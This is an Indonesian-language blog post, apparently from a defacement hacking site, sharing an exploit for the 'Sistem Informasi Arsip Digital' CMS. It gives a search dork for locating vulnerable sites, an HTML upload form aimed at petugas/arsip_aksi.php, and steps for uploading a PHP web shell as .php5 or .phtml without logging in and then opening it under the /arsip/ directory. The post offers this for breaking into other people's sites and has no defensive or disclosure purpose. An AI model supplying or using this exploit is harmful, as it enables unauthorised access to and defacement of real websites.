Kamu Ingin Request Artikel? Klik Oke :)
Beranda
Deface

Deface Cms Arsip Digital Upload Shell

Deface Upload Shell Tanpa Login

Baca Juga

Kali ini Ane Akan Share Exploit Di Cms Informasi Arsip Digital.. 

Yap Mungkin Ini Adalah Exploit Baru Yang Ane Baca Dari Salah Satu Blogger Yang Bernama Jawa Barat Cyber Di Exploit Kali Ini Kalian Tidak Perlu Login Langsung Upload Shell Saja Menggunakan Crsf Yang Saya Buat Sendiri... 

Dork :

"sistem informasi arsip digital" + login

Csrf :

DATA HOSTED WITH ♥ BY PASTEBIN.COM - DOWNLOAD RAW - SEE ORIGINAL
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.     <title>TESTINGGGGGG</title>
  5. </head>
  6. <body>
  7.     <form method="post" action="https://example.com/petugas/arsip_aksi.php" enctype="multipart/form-data">
  8.         <input type="file" name="file">
  9.                  <input type="submit" value="Upload">
  10.     </form>
  11. </body>
  12. </html>

Nah Kalian Copas Saja Csrf Itu Lalu Masukan Site Yang Menurut Kalian Vuln.. 

Jika Sudah Memasukan Site Ke CSRF Nya Kalian Jalankan Csrf Tersebut Di App Browser Kalian Seperti Chrome Uc Browser Dll 

Lalu Kalian Upload Shell Kalian Dengan Ext php5 Atau phtml... 

Jika Success Akan Ke Redirect Ke Login Pagenya... 

Untuk Akses Shell Nya Kalian Tinggal Ke Directory Arsip Nya :

http://example.com/arsip/shell.php

Or

http://example.com/[path]/arsip/shell.php

And Boom.. 

Posting Komentar